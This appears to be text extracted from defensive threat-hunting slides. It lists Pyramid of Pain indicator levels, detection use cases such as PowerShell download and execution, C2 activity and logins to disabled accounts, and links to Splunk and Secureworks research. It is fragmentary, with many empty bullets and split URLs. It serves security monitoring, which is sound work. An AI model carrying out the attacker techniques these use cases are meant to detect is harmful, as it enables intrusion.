•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Threat Intelligence
Vulnerability Management
Incident Response
Continuous Monitoring
•
•
•
TTPs
Tools
Network/Host Artifacts
Domains
IP Addresses
Hash Values
• http://detect-
respond.blogspot.com/2013/03/t
he-pyramid-of-pain.html
• Written by David J
Bianco
USE
CASE:
Windows
EventID
USE CASE:
Scanning
USE CASE: Log into
disabled accounts
USE CASE: C2/
Configuration
Changes
USE CASE: PowerShell
download and execution
•
•
••
•
•
•
• HTTPS://WWW.SPLUNK.COM/BLOG/2017/08/07/PEEPING-THROUGH-WINDOWS-LOGS.HTML
•
•
• HTTPS://WWW.SPLUNK.COM/BLOG/2017/07/06/HUNTI
NG-WITH-SPLUNK-THE-BASICS.HTML
•
•
• HTTPS://WWW.SPLUNK.COM/BLOG/2017/11/0
3/YOU-CAN-T-HYDE-FROM-DR-LEVENSHTEIN-
WHEN-YOU-USE-URL-TOOLBOX.HTML
•
•
•
•
• HTTPS://WWW.SECUREWORKS.COM/RESEARCH/SAKULA-MALWARE-FAMILY
•
• HTTPS://WWW.SPLUNK.COM/BLOG/2018/03/20/HUNTIN
G-YOUR-DNS-DRAGONS.HTML
•
•
• HTTPS://WWW.SPLUNK.COM/BLOG/2018/03/20/H
UNTING-YOUR-DNS-DRAGONS.HTML
•
•
•